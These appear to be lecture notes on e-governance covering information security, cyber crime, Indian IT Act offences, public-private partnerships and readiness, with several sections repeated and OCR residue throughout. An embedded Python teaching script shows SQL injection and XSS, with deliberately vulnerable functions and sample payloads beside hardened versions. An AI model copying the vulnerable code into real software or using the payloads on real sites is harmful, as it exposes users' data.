The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service

2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens

The process approach for information security management system ISMS encourages its users to emphasize the importance of

understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security

implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks

monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.
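As an added example that is not part of the original notes, the following Python script shows the two vulnerability classes named above, SQL injection and XSS, as a vulnerable lookup beside its hardened form; the citizens table, its rows and the test inputs are constructed here and do not come from any real portal.

```python
"""Added example: SQL injection and XSS in a portal-style lookup, vulnerable
form beside the hardened form. Runs offline against an in-memory SQLite DB."""
import html
import sqlite3

# Constructed sample records standing in for an e-Government portal's user table.
SAMPLE_CITIZENS = [
    ("alice", "alice@example.org", "secret1"),
    ("bob", "bob@example.org", "secret2"),
]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", SAMPLE_CITIZENS)
    return conn


def lookup_vulnerable(conn, username):
    """Builds the query by string concatenation, so user input becomes SQL syntax.
    An input containing a quote can change the WHERE clause and expose every row."""
    query = "SELECT username, email FROM citizens WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn, username):
    """Parameterised query: the value travels separately from the SQL text and is
    only ever compared as data, never parsed as SQL."""
    query = "SELECT username, email FROM citizens WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def render_greeting_vulnerable(display_name):
    """Interpolates untrusted text straight into HTML (reflected XSS): markup in
    the name is sent to the browser and executed in the portal's origin."""
    return "<p>Welcome, " + display_name + "</p>"


def render_greeting_hardened(display_name):
    """Escapes the value so the browser shows it as text instead of markup."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    # Constructed malformed input: a quote followed by an always-true condition.
    bad_name = "x' OR '1'='1"
    print(lookup_vulnerable(db, bad_name))  # every row comes back
    print(lookup_hardened(db, bad_name))    # no row has that literal name
    bad_html = "<script>alert(1)</script>"
    print(render_greeting_vulnerable(bad_html))
    print(render_greeting_hardened(bad_html))
```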


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on E-commerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access;

• Downloads, copies or extracts any data, computer database or any information;

• Introduces or causes to be introduced any virus or contaminant;

• Disrupts or causes disruption;

• Denies or causes denial of access to any person;

• Provides any assistance to any person to facilitate access;

• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions:

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences:

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years and/or fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years and/or fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms:

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand, and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer, and like any organization it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and businesses via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

  - Long Term Contracts

  - User Charges and/or Payments flowing between the Parties

  - Shared Investments, but Mainly Private

  - Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition - For and In the Market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management: Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit.

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration, but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement.

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information

Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment

or any offence against morality social order or any unjust or shameful act The ldquoOffence

is defined in the Code of Criminal Procedure to mean as an act or omission made

punishable by any law for the time being in force

Cyber Crime is emerging as a serious threat World wide governments police

departments and intelligence units have started to react

Cyber Crime is a term used to broadly describe criminal activity in which computers or

computer networks are a tool a target or a place of criminal activity and include everything

from electronic cracking to denial of service attacks It is also used to include traditional

crimes in which computers or networks are used to enable the illicit activity

Computer crime mainly consists of unauthorized access to computer systems data

alteration data destruction theft of intellectual property Cyber crime in the context of

national security may involve hacking traditional espionage or information warfare and

related activities

Pornography Threatening Email Assuming someones Identity Sexual Harassment

Defamation Spam and Phishing are some examples where computers are used to commit

crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking

are examples where computers become target of crime

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data

stored in them Hacking had witnessed a 37 per cent increase this year

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune

This is an issue that has not been tackled in IT ACT 2000

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their

money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions

requesting them to enter their Username Password or other personal information to access their

Account for some reason

The fraudster then has access to the customers online bank account and to the funds contained

in that account

Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is

used interchangeably with online harassment and online abuse Stalking generally involves

harassing or threatening behaviour that an individual engages in repeatedly such as following a

person appearing at a persons home or place of business making harassing phone calls leaving

written messages or objects or vandalizing a persons property

PREPARED BY ARUN PRATAP SINGH 55

55

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access

to private personal and financial information from the public for the purpose of financial reward

The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline

telephone services

Vishing is typically used to steal credit card numbers or other information used in identity theft

schemes from individuals

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users up by 28 from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages

PREPARED BY ARUN PRATAP SINGH 56

56

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access
• Downloads, copies or extracts any data, computer database or any information
• Introduces or causes to be introduced any virus or contaminant
• Disrupts or causes disruption
• Denies or causes denial of access to any person
• Provides any assistance to any person to facilitate access
• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• Any information that is grossly offensive or has menacing character; or
• Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years, or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated the 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years, or/and fine up to 5 lakh rupees.

Section 66-A – Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations

• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits

• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership
• Implementing the Partnership

Project Management - Six Distinct Phases

Genesis
• What's the need?
• What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
• Is there a need for a Public/Private Partnership?

Preliminary Project Definition
• Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market Research
• Economic/Financial Analysis
• Program, Budget and Schedule
• Risk Analysis

Plan and Test
• Final project definition: What is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?
• Master Schedule/Budget
• Political Climate
• Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
• How do you choose and contract with the best-value private partner?
• What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
• What do current statutes allow?
• Procurement Approach: Sole Source, RFP, Low Bid
• Risk Allocation between Public and Private Partners
• Structuring of Contract/Risks and Rewards

Implement
• Environmental
• Design
• Permitting
• Construction
• Commissioning and Administration

Operate
• Startup
• Monitoring
• Assessment
• Enhancement
• Contract Modifications
• Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

